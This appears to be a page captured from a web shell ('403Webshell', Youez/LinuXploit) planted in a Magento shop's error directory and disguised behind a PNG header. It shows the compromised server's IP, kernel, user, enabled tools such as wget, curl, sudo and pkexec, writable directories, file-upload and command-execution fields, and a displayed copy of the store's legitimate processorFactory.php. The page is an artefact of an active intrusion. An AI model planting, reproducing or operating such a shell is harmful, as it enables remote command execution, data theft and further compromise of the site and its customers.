‰PNG  IHDRwSȚ-tEXtCommentNxplo403WebShell
403Webshell
Server IP : 144.76.1.235  /  Your IP : 216.73.216.244
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux einkaufsring.com 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.3.16
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/shop.einkaufsring.com/pub/errors/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/shop.einkaufsring.com/pub/errors/processorFactory.php
<?php
/**
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */
// phpcs:disable PSR1.Files.SideEffects
namespace Magento\Framework\Error;

// phpcs:ignore Magento2.Functions.DiscouragedFunction,Magento2.Security.IncludeFile
require_once realpath(__DIR__) . '/../../app/bootstrap.php';
require_once 'processor.php'; // phpcs:ignore Magento2.Security.IncludeFile
use Magento\Framework\App\ObjectManager as AppObjectManager;

/**
 * Error processor factory
 */
class ProcessorFactory
{
    /**
     * Create Processor
     *
     * @return Processor
     */
    public function createProcessor()
    {
        try {
            $objectManager = AppObjectManager::getInstance();
            return $objectManager->create(Processor::class);
        } catch (\RuntimeException $exception) {
            // phpcs:ignore Magento2.Security.Superglobal
            $objectManagerFactory = \Magento\Framework\App\Bootstrap::createObjectManagerFactory(BP, $_SERVER);
            $objectManager = $objectManagerFactory->create($_SERVER); // phpcs:ignore Magento2.Security.Superglobal
            $response = $objectManager->create(\Magento\Framework\App\Response\Http::class);
            return new Processor($response);
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit